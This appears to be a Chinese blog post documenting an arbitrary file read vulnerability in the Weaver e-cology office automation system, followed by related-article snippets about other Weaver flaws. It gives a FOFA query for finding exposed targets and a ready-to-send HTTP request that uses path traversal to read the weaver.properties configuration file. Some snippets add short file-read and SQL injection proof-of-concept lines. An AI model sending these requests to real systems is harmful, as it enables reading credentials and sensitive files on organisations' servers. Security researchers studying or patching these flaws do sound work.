首页 > 其他分享 >泛微e-cology_getE9DevelopAllNameValue2任意文件读取漏洞

泛微e-cology_getE9DevelopAllNameValue2任意文件读取漏洞

时间:2024-03-28 22:34:03浏览次数:26  
标签:xml image 漏洞 cology getE9DevelopAllNameValue2 泛微

漏洞描述

泛微e-cology依托全新的设计理念,全新的管理思想。为中大型组织创建全新的高效协同办公环境。智能语音办公,简化软件操作界面。身份认证、电子签名、电子签章、数据存证让合同全程数字化。泛微e-cology getE9DevelopAllNameValue2接口存在任意文件读取漏洞,通过该漏洞可以访问任意文件。

受影响版本

  • 泛微e-cology

    Fofa语法与漏洞编号

app="泛微-OA(e-cology)"

页面信息

cve 漏洞编号

未知

漏洞复现

存在问题的接口

GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,applicat

标签:xml,image,漏洞,cology,getE9DevelopAllNameValue2,泛微
From: https://blog.csdn.net/weixin_43567873/article/details/137112298

相关文章

  • 泛微OA触发关联流程提交操作思路
    1.首先数据下数据字典,查询workflow_requestbase表的currentnodeid,currentnodetype.根据判断条件requestid查询即可2.第二部完成数据库端数据的查询更新,及前端页面的效果测试 3.更新好节点ID和节点类型后会发现流程会出现在下一个节点,这个时候编写action即可(可加各种判断条......
  • net8获取泛微token以及访问api示例
    工作中涉及到调用泛微的场景,官方的示例又臭又长,抽空用NET8简化了写法,为了简化http访问,用了Flurl.Http这个库。在座各位大佬,我们直接就看代码了 usingSystem.Security.Cryptography;usingSystem.Text.Json;usingFlurl.Http;//请按照官方内容做好初始化工作https://e-c......
  • 关于C#的RSA加密(用于泛微OA)
    由于项目需要,需要用公钥对秘钥进行加密,且对接系统用C#开发,需求是这样的:  注册许可证时返回的公钥spk对秘钥信息secrit进行加密。由于公钥spk是字符串,但C#中只认可的xml字符串的公钥才能够进行加密,可以使用以下方法,先进行转换,将公钥字符串转换成XML,再进行加密,就可以得到加密......
  • 泛微网络与浪潮信息KeyarchOS完成兼容性技术认证
    日前,泛微网络协同商务软件与浪潮信息KeyarchOS完成兼容性技术认证,经过共同测试,泛微协同商务软件e-cology与浪潮信息KeyarchOS完全兼容,在安全性、稳定性、兼容性方面均表现优异,达成稳定运行、性能优越目标。泛微网络科技股份有限公司成立于2001年,总部设立于上海,专注于协同管理软件......
  • 基于泛微Ecology代码块开发实现劳动合同开始结束日期、试用开始结束日期计算赋值
    基于泛微Ecology代码块开发实现劳动合同开始结束日期、试用开始结束日期计算赋值//劳动合同开始结束日期、试用开始结束日期计算赋值,载入时触发,jQuery().ready(function(){ varCalculatecontractdate=function(){//获取相关数据varrzrq=WfForm.getFieldValue("field10954")......
  • 泛微E-Office init.php SQL注入漏洞
    漏洞简介泛微E-Office协同办公平台/E-mobile/App/Init.php接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,进行增、删、改、查等数据库操作,造成数据库敏感数据信息泄露或被篡改;漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:POC:POST/E-mobile/App/Init.php?m=......
  • 泛微E-Office协同管理系统存在任意文件读取漏洞CNVD-2022-07603
    漏洞描述泛微e-office是一款由泛微网络科技股份有限公司开发的办公自动化(OfficeAutomation,简称OA)系统。它是一种基于Web的协同办公平台,可以帮助企业实现电子化、自动化、智能化的办公环境。泛微e-officeofficeserver2.php文件存在任意文件读取漏洞,攻击者可利用该漏洞读取服务......
  • 泛微emessage管理界面存在任意文件读取漏洞2023
    漏洞简介泛微emessage管理界面存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。漏洞复现fofa语法:icon_hash="-1477694668"登录页面如下:POC:POST/HTTP/1.1Host:User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.......
  • 泛微E-Bridge saveYZJFile任意文件读取漏洞
    漏洞描述泛微云桥e-Bridge存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。漏洞复现fofa语法:app="泛微云桥e-Bridge"登录页面如下:windows系统POC:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txtLinux......
  • 泛微E-Office json_common.php文件存在sql注入漏洞
    漏洞简介泛微e-office为企业办公提供丰富应用,覆盖常见协作场景,开箱即用。满足人事、行政、财务、销售、运营、市场等不同部门协作需求,帮助组织高效人事管理。系统json_common.php文件存在SQL注入漏洞漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:POC:POST/building/......